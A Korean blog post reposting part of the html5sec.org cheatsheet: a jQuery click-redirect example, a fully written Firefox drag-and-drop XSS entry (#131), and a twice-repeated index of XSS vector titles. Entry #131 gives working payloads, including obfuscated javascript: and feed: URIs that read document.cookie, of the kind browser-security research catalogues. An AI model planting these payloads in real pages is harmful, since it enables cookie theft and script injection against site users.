behaviour follows from the "href" attribute.
<span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>
- clickjacking
- classjacking
- jQuery
- class
mniemietz
Passive XSS via Drag&Drop of specially crafted URIs#131 test
It is possible to bypass Mozilla Firefox (tested on version 8.x and 9.x) internal protection and execute JavaScript Drag and Drop by using capitalization and Feed protocol, and to run that JavaScript on the top page if you can include the malicious page in an IFrame. The "event.preventDefault()" method in "ondragover" event of the element is to block the natural function of the browser. Usually the malicious IFrame should deceive the user to drag and drop a JS to the drop box which can be concealed in a hidden "Textarea" element.
<b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
- drag&drop
- html5
- iframe
- feed
- firefox
- https://bugzilla.mozilla.org/show_bug.cgi?id=704354
- http://soroush.secproject.com/blog/2011/12/drag-and-drop-xss-in-firefox-by-html5-cross-domain-in-frames/

저작자표시

'개발 > 팁' 카테고리의 다른 글

RSpec basic authentication helper module for request and controller specs (0)	2017.04.01
페이스북 컬러 (0)	2017.01.04
워드 프레스 암호 방식과 업데이트 (0)	2015.09.28
CSS Wishlist (0)	2011.12.21
Internet Explorer 8 검색 상자 제거하기 (0)	2011.12.17

html5sec

curity CheatsheetWhat your browser does when you look away...

Vectors making use of HTML5 features

XSS via formaction - requiring user interaction (1)#1test

Self-executing focus event via autofocus#7test

Self-executing blur event via autofocus competition#8test

JavaScript execution via <VIDEO> poster attribute#10test

Self-executing JavaScript via <BODY> onscroll autofocus#12test

Form surveillance with onformchange, onforminput and form attributes#23test

JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55test

JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56test

XSS via formaction - requiring user interaction (2)#72test

Passive JavaScript execution via <BODY> and oninput attribute#86test

Passive JavaScript execution via MathML on Firefox#130test

Transparent overwriting of request-data using HTML5 "dirname" attributes#136test

Executing JavaScript via cross-origin HTML imports#138test

Executing JavaScript via "srcdoc" attribute in Iframes#139test

HTML5 <picture> element and "srcset" attributes#142test

Bypassing window.opener protection of rel="noreferrer"#143test

Generating greater-than with HTML5 Named Character References#144test

XSS without User Interaction from passive Elements#145test

JavaScript execution via <DETAILS> and ontoggle#147test

JavaScript execution via <VIDEO> with empty source and rate change events#148test

Vectors working on HTML4 and older versions

JavaScript execution via <FRAMESET> and onload#31test

JavaScript execution via <TABLE> and background#32test

HTML comment parsing issues (1)#37test

HTML comment parsing issues (2)#38test

CDATA section parsing issues#39test

Plaintext tags used for markup obfuscation#40test

Error handler via empty list-style and load handler via empty content#41test

Link hijacking via <BASE> and JavaScript URI#42test

JavaScript execution via <SCRIPT> for and event attributes#48test

JavaScript execution via <OBJECT> DataURL attribute#49test

JavaScript execution via <OBJECT> data#50test

JavaScript execution via <EMBED> src#51test

Tags nested in other tags to trick filters#57test

XSS using accent grave when copying innerHTML (1)#59test

Simulating attributes in IE#62test

JavaScript execution via src attribute#63test

JavaScript execution via IE filters and onfilterchange#70test

<OBJECT> tag and Flash files executing JavaScript#79test

Special tags parsing issues#91test

JavaScript execution via MHTML-scheme#96test

XSS using "xmlns" attribute in custom tag when copying innerHTML (2)#97test

HTML separators and ignored characters#100test

Characters ignored in the URI scheme#101test

Forced plaintext via unbalanced quotes in Internet Explorer#102test

Safari attribute ofuscation with slashes and quotes#106test

JavaScript execution via <TITLE> tag on Inernet Explorer 9#107test

Internet Explorer parameter parsing issue#108test

Internet Explorer conditional comments - XSS via [if]> and <img> injection#115test

Backslashes as alternative to slashes on Webkit#124test

QuickTime events causing JavaScript execution#126test

Ending HTML comments with a backtick character#133test

"<% %>" and "" inside plaintext tags#134test

JavaScript execution via <FRAMESET> and onpageshow#146test

JavaScript execution via <APPLET> with error events#149test

Cascading stylesheet injection based vectors

Opera link-source JavaScript execution via CSS#9test

Opera whole-page click hijacking via CSS#27test

JavaScript execution via <LINK> href attribute and data URI#29test

JavaScript execution via <STYLE> @import and data URI#30test

Breaking pointer-events:none with nested links#33test

Opera @import based XSS inside attribute selectors#44test

CSS-string breaking#45test

Alternative CSS syntax in Internet Explorer#46test

Obfuscation css-properties and values via ignored extra characters#60test

CSS encoding and escaping#61test

Slash-tags accepting style attributes#71test

IE6 and halfwidth/fullwidth Unicode characters#80test

SVG images containing XML data - with disabled JavaScript#90test

Breaking the functional notation on IE (1)#92test

Multiple CSS "url()" values in IE 6#93test

Style injection when copying innerHTML (3)#98test

Using comments to obfuscate styles#99test

Breaking the functional notation on Chrome and Safari (2)#111test

Breaking the functional notation on IE (3)#112test

Jump into the selector via attribute delimiters#113test

Breaking the functional notation on Chrome and Safari (4)#114test

XSS via formaction - requiring user interaction (1)#1 test

Self-executing focus event via autofocus#7 test

Self-executing blur event via autofocus competition#8 test

JavaScript execution via <VIDEO> poster attribute#10 test

Self-executing JavaScript via <BODY> onscroll autofocus#12 test

Form surveillance with onformchange, onforminput and form attributes#23 test

JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55 test

JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56 test

XSS via formaction - requiring user interaction (2)#72 test

Passive JavaScript execution via <BODY> and oninput attribute#86 test

Passive JavaScript execution via MathML on Firefox#130 test

Transparent overwriting of request-data using HTML5 "dirname" attributes#136 test

Executing JavaScript via cross-origin HTML imports#138 test

Executing JavaScript via "srcdoc" attribute in Iframes#139 test

HTML5 <picture> element and "srcset" attributes#142 test

Bypassing window.opener protection of rel="noreferrer"#143 test

Generating greater-than with HTML5 Named Character References#144 test

XSS without User Interaction from passive Elements#145 test

JavaScript execution via <DETAILS> and ontoggle#147 test

JavaScript execution via <VIDEO> with empty source and rate change events#148 test

JavaScript execution via <FRAMESET> and onload#31 test

JavaScript execution via <TABLE> and background#32 test

HTML comment parsing issues (1)#37 test

HTML comment parsing issues (2)#38 test

CDATA section parsing issues#39 test

Plaintext tags used for markup obfuscation#40 test

Error handler via empty list-style and load handler via empty content#41 test

Link hijacking via <BASE> and JavaScript URI#42 test

JavaScript execution via <SCRIPT> for and event attributes#48 test

JavaScript execution via <OBJECT> DataURL attribute#49 test

JavaScript execution via <OBJECT> data#50 test

JavaScript execution via <EMBED> src#51 test

Tags nested in other tags to trick filters#57 test

XSS using accent grave when copying innerHTML (1)#59 test

Simulating attributes in IE#62 test

JavaScript execution via src attribute#63 test

JavaScript execution via IE filters and onfilterchange#70 test

<OBJECT> tag and Flash files executing JavaScript#79 test

Special tags parsing issues#91 test

JavaScript execution via MHTML-scheme#96 test

XSS using "xmlns" attribute in custom tag when copying innerHTML (2)#97 test

HTML separators and ignored characters#100 test

Characters ignored in the URI scheme#101 test

Forced plaintext via unbalanced quotes in Internet Explorer#102 test

Safari attribute ofuscation with slashes and quotes#106 test

JavaScript execution via <TITLE> tag on Inernet Explorer 9#107 test

Internet Explorer parameter parsing issue#108 test

Internet Explorer conditional comments - XSS via [if]> and <img> injection#115 test

Backslashes as alternative to slashes on Webkit#124 test

QuickTime events causing JavaScript execution#126 test

Ending HTML comments with a backtick character#133 test

"<% %>" and "" inside plaintext tags#134 test

JavaScript execution via <FRAMESET> and onpageshow#146 test

JavaScript execution via <APPLET> with error events#149 test

Opera link-source JavaScript execution via CSS#9 test

Opera whole-page click hijacking via CSS#27 test

JavaScript execution via <LINK> href attribute and data URI#29 test

JavaScript execution via <STYLE> @import and data URI#30 test

Breaking pointer-events:none with nested links#33 test

Opera @import based XSS inside attribute selectors#44 test

CSS-string breaking#45 test

Alternative CSS syntax in Internet Explorer#46 test

Obfuscation css-properties and values via ignored extra characters#60 test

CSS encoding and escaping#61 test

Slash-tags accepting style attributes#71 test

IE6 and halfwidth/fullwidth Unicode characters#80 test

SVG images containing XML data - with disabled JavaScript#90 test

Breaking the functional notation on IE (1)#92 test

Multiple CSS "url()" values in IE 6#93 test

Style injection when copying innerHTML (3)#98 test

Using comments to obfuscate styles#99 test

Breaking the functional notation on Chrome and Safari (2)#111 test

Breaking the functional notation on IE (3)#112 test

Jump into the selector via attribute delimiters#113 test

Breaking the functional notation on Chrome and Safari (4)#114 test

Firefox setter based JavaScript execution#6 test

JavaScript execution via sharp variables#15 test

JavaScript execution via overwritten ReferenceError object#20 test

JavaScript execution via proprietary noSuchMethod#21 test

Spoofing the address bar information with history.replaceState()#103 test